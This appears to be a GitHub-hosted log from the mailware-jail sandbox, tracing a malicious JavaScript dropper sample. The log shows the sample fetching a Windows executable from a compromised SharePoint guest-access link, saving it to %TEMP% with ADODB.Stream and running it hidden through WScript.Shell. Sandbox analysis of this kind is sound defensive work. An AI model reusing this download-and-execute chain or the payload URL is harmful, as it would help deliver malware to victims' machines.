-
Notifications
You must be signed in to change notification settings - Fork 97
/
Copy pathece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.out
62 lines (62 loc) · 5.99 KB
/
ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.out
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
21 Nov 23:11:18 - mailware-jail, a malware sandbox ver. 0.10
21 Nov 23:11:18 - ------------------------
21 Nov 23:11:18 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js
21 Nov 23:11:18 - Malware files: malware/20161022/ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js
21 Nov 23:11:18 - Output file for sandbox dump: sandbox_dump_after.json
21 Nov 23:11:18 - Output directory for generated files: output/
21 Nov 23:11:18 - ==> Preparing Sandbox environment.
21 Nov 23:11:18 - => Executing: env/utils.js quitely
21 Nov 23:11:18 - => Executing: env/eval.js quitely
21 Nov 23:11:18 - => Executing: env/function.js quitely
21 Nov 23:11:18 - => Executing: env/wscript.js quitely
21 Nov 23:11:18 - => Executing: env/browser.js quitely
21 Nov 23:11:18 - => Executing: env/agents.js quitely
21 Nov 23:11:18 - => Executing: env/other.js quitely
21 Nov 23:11:18 - => Executing: env/console.js quitely
21 Nov 23:11:18 - ==> Executing malware file(s). =========================================
21 Nov 23:11:18 - => Executing: malware/20161022/ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js verbosely, reporting silent catches
21 Nov 23:11:18 - Saving: output/malware_20161022_ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js
21 Nov 23:11:19 - ActiveXObject(WScript.Shell)
21 Nov 23:11:19 - new WScript.Shell[9]
21 Nov 23:11:19 - WScript.Shell[9].ExpandEnvironmentStrings(%TEMP%/vbNU_w19.exe)
21 Nov 23:11:19 - ActiveXObject(MSXML2.XMLHTTP)
21 Nov 23:11:19 - new MSXML2.XMLHTTP[10]
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].onreadystatechange = (undefined) 'undefined'
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].open(GET,https://caringhomes-my.sharepoint.com/personal/scroker_grettonhomes_co_uk/_layouts/15/guestaccess.aspx?guestaccesstoken=mIsLpZRC5kC0BSqjuCwQfch5hD0Fx9hHVjmqjREs%2b%2fY%3d&docid=0c192762e149049c5831f008a9b492fa8&rev=1,0)
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].method = (string) 'GET'
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].url = (string) 'https://caringhomes-my.sharepoint.com/personal/scroker_grettonhomes_co_uk/_layouts/15/guestaccess.aspx?guestaccesstoken=mIsLpZRC5kC0BSqjuCwQfch5hD0Fx9hHVjmqjREs%2b%2fY%3d&docid=0c192762e149049c5831f008a9b492fa8&rev=1'
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].async = (boolean) 'false'
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].async.get() => (boolean) 'false'
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].send(undefined)
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].method.get() => (string) 'GET'
21 Nov 23:11:19 - MSXML2.XMLHTTP[10].url.get() => (string) 'https://caringhomes-my.sharepoint.com/personal/scroker_grettonhomes_co_uk/_layouts/15/guestaccess.aspx?guestaccesstoken=mIsLpZRC5kC0BSqjuCwQfch5hD0Fx9hHVjmqjREs%2b%2fY%3d&docid=0c192762e149049c5831f008a9b492fa8&rev=1'
21 Nov 23:11:20 - sync_req: MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].status = (number) '200'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].readystate = (number) '4'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].statustext = (string) 'OK'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].responsebody = (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].allresponseheaders = (string) '{"cache-control":"private","content-length":"120808","content-type":"application/pdf","accept-ranges":"bytes","etag":"\"{C192762E-1490-49C5-831F-008A9B492FA8},1\"","server":"Microsoft-IIS/8.5","x-sharepointhealthscore":"0","x-download-options":"noope ... (truncated)'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].onreadystatechange.get() => (undefined) 'undefined'
21 Nov 23:11:20 - 1: readystate
21 Nov 23:11:20 - 2: 4
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].readystate.get() => (number) '4'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].statustext.get() => (string) 'OK'
21 Nov 23:11:20 - 5: statusText
21 Nov 23:11:20 - 6: OK
21 Nov 23:11:20 - ActiveXObject(ADODB.Stream)
21 Nov 23:11:20 - new ADODB_Stream[11]
21 Nov 23:11:20 - ADODB_Stream[11].Open()
21 Nov 23:11:20 - ADODB_Stream[11].type = (number) '1'
21 Nov 23:11:20 - MSXML2.XMLHTTP[10].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)'
21 Nov 23:11:20 - ADODB_Stream[11].content = (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)'
21 Nov 23:11:20 - ADODB_Stream[11].Write(str) - 120808 bytes
21 Nov 23:11:20 - ADODB_Stream[11].size = (number) '120808'
21 Nov 23:11:20 - ADODB_Stream[11].position = (number) '0'
21 Nov 23:11:20 - ADODB_Stream[11].SaveToFile(%TEMP%/vbNU_w19.exe, 2)
21 Nov 23:11:20 - ADODB_Stream[11].content.get() => (object) 'MZ??????????????????????@???????????????????????????????????????3#D???)?3#G?O?)?3#S???)?3#U???)?3#Q???)?Rich??)?????????????????PE??L???;?Eh??????????????????????????????????????????@??????????????????????????????????^???????????????????????????????? ... (truncated)'
21 Nov 23:11:20 - ADODB_Stream[11].Close()
21 Nov 23:11:20 - WScript.Shell[9].Run(%TEMP%/vbNU_w19.exe, 0, 0)
21 Nov 23:11:20 - ==> Cleaning up sandbox.
21 Nov 23:11:20 - ==> Script execution finished, dumping sandbox environment to a file.
21 Nov 23:11:20 - The sandbox context has been saved to: sandbox_dump_after.json
21 Nov 23:11:20 - Saving: output/_TEMP__vbNU_w19.exe